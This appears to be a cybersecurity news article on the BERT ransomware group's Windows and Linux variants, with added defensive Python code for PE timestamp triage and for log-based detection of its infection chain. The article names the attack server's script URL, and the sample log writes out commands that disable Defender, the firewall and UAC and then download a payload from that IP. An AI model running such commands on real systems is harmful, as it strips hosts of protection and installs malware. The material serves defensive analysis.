A newly evolved ransomware group dubbed “BERT” has significantly ramped up its operations and is now actively targeting Linux environments through weaponized ELF binaries, a notable shift from its original focus on Windows-based systems.
First detected in April 2025, BERT’s activity can be traced back to mid-March 2025, with researchers attributing the group’s rapid rise to its aggressive use of customized malware and advanced exploitation techniques.
Attack Vector
BERT appears to primarily leverage phishing campaigns to infiltrate victim networks. Once inside, the attackers deploy tailored payloads depending on the victim’s operating system.
Notably, the group has established multiple dark web portals: one for operational communication and another to leak exfiltrated data in staged, zipped archives labeled as “part1,” “part2,” etc.
Both leak and storage servers reportedly run Apache/2.4.52 on Ubuntu, signaling a calculated infrastructure deployment.
Unlike many peers, BERT does not maintain a dedicated ransomware negotiation portal.
Instead, ransom demands, which typically request payment in Bitcoin, are negotiated via privacy-centric messaging apps. Demands as high as 1.5 BTC have been observed in several incidents.

BERT’s targets span multiple countries, with the United States leading in victim count, closely followed by the UK, Malaysia, Taiwan, Colombia, and Turkey.
According to The Raven File Report, the services and manufacturing sectors have been disproportionately affected, though logistics, IT, and healthcare organizations have also fallen prey.
Technical Analysis
Upon analysis of acquired ransomware samples, researchers identified six PE (Windows executable) files and two ELF (Linux executable) files, with only one bearing a plausible timestamp (May 20, 2025).
The rest exhibit artificially manipulated creation dates projected into future decades, likely as an evasion tactic.
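A future-dated build timestamp is cheap for an analyst to check during triage. The following is an added example, not code from the article or from any of the researchers it cites: it reads the COFF TimeDateStamp straight out of a PE header and buckets it as plausible, ancient, or impossible (in the future). The minimal PE-shaped byte strings it builds are constructed for the demo and are not real binaries; the epoch values for "now" and for the May 20, 2025 sample are assumptions chosen to make the output deterministic.

```python
import struct
from datetime import datetime, timedelta, timezone

# Offsets from the PE/COFF specification: e_lfanew lives at 0x3C of the DOS header,
# and the COFF TimeDateStamp sits 8 bytes past the "PE\0\0" signature.
E_LFANEW_OFFSET = 0x3C
PE_SIGNATURE = b"PE\0\0"
TIMESTAMP_OFFSET_FROM_PE = 8


def pe_timestamp(data: bytes) -> datetime:
    """Return the COFF TimeDateStamp of a PE image as an aware UTC datetime."""
    if len(data) < E_LFANEW_OFFSET + 4 or data[:2] != b"MZ":
        raise ValueError("not a PE image: missing MZ header")
    e_lfanew = struct.unpack_from("<I", data, E_LFANEW_OFFSET)[0]
    if data[e_lfanew:e_lfanew + 4] != PE_SIGNATURE:
        raise ValueError("not a PE image: bad PE signature")
    stamp = struct.unpack_from("<I", data, e_lfanew + TIMESTAMP_OFFSET_FROM_PE)[0]
    return datetime.fromtimestamp(stamp, tz=timezone.utc)


def classify_timestamp(stamp: datetime, now: datetime, max_age_years: int = 30) -> str:
    """Bucket a build timestamp: 'future' (impossible), 'ancient' (suspicious) or 'plausible'."""
    if stamp > now + timedelta(days=1):           # one day of slack for clock skew
        return "future"
    if stamp < now - timedelta(days=365 * max_age_years):
        return "ancient"
    return "plausible"


def triage(data: bytes, now_epoch=None) -> dict:
    """Triage one PE image; now_epoch is injectable so results are reproducible."""
    now = (datetime.fromtimestamp(now_epoch, tz=timezone.utc)
           if now_epoch is not None else datetime.now(timezone.utc))
    stamp = pe_timestamp(data)
    return {"timestamp": stamp.isoformat(), "verdict": classify_timestamp(stamp, now)}


def build_stub_pe(stamp: int) -> bytes:
    """Constructed minimal PE-shaped byte string for the demo; it is not a runnable binary."""
    dos_header = bytearray(0x40)
    dos_header[:2] = b"MZ"
    struct.pack_into("<I", dos_header, E_LFANEW_OFFSET, 0x40)   # PE header right after the DOS header
    # COFF header: Machine (x64), NumberOfSections, TimeDateStamp, remaining fields zeroed
    coff = struct.pack("<HHI", 0x8664, 1, stamp) + b"\0" * 12
    return bytes(dos_header) + PE_SIGNATURE + coff


if __name__ == "__main__":
    NOW = 1751328000  # assumed "now": 2025-07-01T00:00:00Z, fixed so the output is deterministic
    for label, ts in [("plausible build", 1747699200),    # 2025-05-20T00:00:00Z
                      ("future-dated build", 2700000000), # a day in 2055
                      ("zeroed timestamp", 0)]:           # 1970-01-01, typical of stripped headers
        print(label, triage(build_stub_pe(ts), NOW))
```

Treat the verdict as one signal, not proof: toolchains that emit reproducible builds write a hash-derived value into TimeDateStamp, so an "ancient" or otherwise odd stamp on a legitimately signed file is not unusual, while a stamp decades in the future is never the output of a normal build.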
The primary file names associated with BERT include “newcryptor.exe,” “Bert,” “Bert11,” “worker.exe,” and “payload.exe.”
While the Windows variant uses RSA encryption through the Windows API and appends unique file extensions such as “encryptedbybert,” “encryptedbybert3,” and “encryptedbybert11,” the Linux variant stands out by incorporating substantial code from the infamous Sodinokibi (REvil) ransomware: an 80% codebase match was detected.
The Linux payload uses AES and RC4 PRGA, and in some cases, Salsa20 and ChaCha stream ciphers, with sensitive data also subject to Base64 encoding for added obscurity.
An innovative twist is the observed use of AWK commands to interrogate system registries, diverging from standard ransomware practices.

The Windows infection chain often begins with a malicious PowerShell script hosted on an external server (e.g., http://185.100.157.74/start.ps1).
This script systematically disables key security controls: it disables Windows Defender, stops the firewall and related services, and turns off User Account Control (UAC).
Once system defenses are neutralized, the script fetches and executes the main ransomware payload from the same server.
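The useful detection signal in this chain is the sequence, not any single command: defenses being switched off on a host shortly before a download cradle runs. The following is an added example, not code from the article or from any product it mentions. It scores process-creation events per host against one pattern per stage described above and alerts when several distinct stages appear on the same host. The log lines are constructed in a simple key=value form (only the IP address and the “payload.exe” name come from the article); the patterns are my own approximations of common command shapes and should be tuned against real telemetry.

```python
import re
from collections import defaultdict

# Constructed process-creation events (not real telemetry). The IP address and the
# "payload.exe" name come from the article; hosts, users, PIDs and times are made up.
SAMPLE_LOG = r"""
2025-06-02T10:14:03Z host=WS-04 user=jdoe pid=4120 cmd=powershell.exe -c "Set-MpPreference -DisableRealtimeMonitoring $true"
2025-06-02T10:14:05Z host=WS-04 user=jdoe pid=4120 cmd=powershell.exe -c "Stop-Service -Name MpsSvc -Force"
2025-06-02T10:14:06Z host=WS-04 user=jdoe pid=4120 cmd=reg.exe add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
2025-06-02T10:14:09Z host=WS-04 user=jdoe pid=4120 cmd=powershell.exe -c "Invoke-WebRequest http://185.100.157.74/payload.exe -OutFile C:\Users\Public\payload.exe"
2025-06-02T10:20:11Z host=WS-07 user=admin pid=902 cmd=powershell.exe -c "Invoke-WebRequest https://updates.example.internal/agent.msi -OutFile C:\Temp\agent.msi"
2025-06-02T10:22:40Z host=WS-09 user=svc_build pid=771 cmd=powershell.exe -c "Stop-Service -Name Spooler"
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+)\s+host=(?P<host>\S+)\s+user=(?P<user>\S+)\s+pid=(?P<pid>\d+)\s+cmd=(?P<cmd>.*)$"
)

# One pattern per stage of the chain. These are assumed approximations of common
# command shapes, not a vendor rule set; expect to tune them for your environment.
STAGE_PATTERNS = {
    "defender_disabled": re.compile(r"Set-MpPreference\s+-Disable\w+", re.I),
    "security_service_stopped": re.compile(
        r"(?:Stop-Service|sc(?:\.exe)?\s+stop|net\s+stop)\b.*?\b(?:MpsSvc|WinDefend|wscsvc|Sense)\b"
        r"|netsh\s+advfirewall\s+set\s+\w+\s+state\s+off", re.I),
    "uac_disabled": re.compile(r"EnableLUA\b.*?\b0\b", re.I),
    "download_cradle": re.compile(
        r"Invoke-WebRequest|\biwr\b|DownloadString|DownloadFile|Net\.WebClient|Start-BitsTransfer", re.I),
}


def parse_events(log_text):
    """Yield (timestamp, host, cmd) tuples; malformed lines are skipped rather than fatal."""
    for raw in log_text.splitlines():
        m = LINE_RE.match(raw.strip())
        if m:
            yield m.group("ts"), m.group("host"), m.group("cmd")


def detect_chain(log_text, min_stages=3):
    """Per host, record which stages fired; alert when at least min_stages distinct stages appear."""
    hits = defaultdict(lambda: {"stages": set(), "first_seen": None})
    for ts, host, cmd in parse_events(log_text):
        for stage, pattern in STAGE_PATTERNS.items():
            if pattern.search(cmd):
                entry = hits[host]          # only hosts with at least one hit get an entry
                entry["stages"].add(stage)
                entry["first_seen"] = entry["first_seen"] or ts
    return {
        host: {"stages": sorted(e["stages"]),
               "first_seen": e["first_seen"],
               "alert": len(e["stages"]) >= min_stages}
        for host, e in hits.items()
    }


if __name__ == "__main__":
    for host, result in detect_chain(SAMPLE_LOG).items():
        print(host, result)
```

Run against the sample, WS-04 trips all four stages and alerts, WS-07 shows a lone download of an internal installer and stays below the threshold, and WS-09 (an admin stopping the print spooler) produces no entry at all, because the service pattern is restricted to security services rather than any Stop-Service call. Stacking stages per host is what keeps the false-positive rate tolerable; a single "disable real-time monitoring" event is common during legitimate maintenance.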
Incidentally, both the script and executable are maintained on infrastructure registered to UNITEDNET (Edinaya Set Limited), a Russian firm, continuing a trend of leveraging Russian hosting providers for cybercrime operations.
BERT’s willingness to write its own code for the Windows platform while repurposing the REvil codebase for Linux operations underscores the group’s technical adaptability and evolving sophistication.
By weaponizing both PE and ELF binaries and relying on multi-stage attacks that disable security controls before detonation, BERT has positioned itself as a formidable threat in the ransomware landscape.
Security researchers caution organizations, particularly those with Linux workloads, to bolster detection and response efforts as BERT continues to refine its arsenal.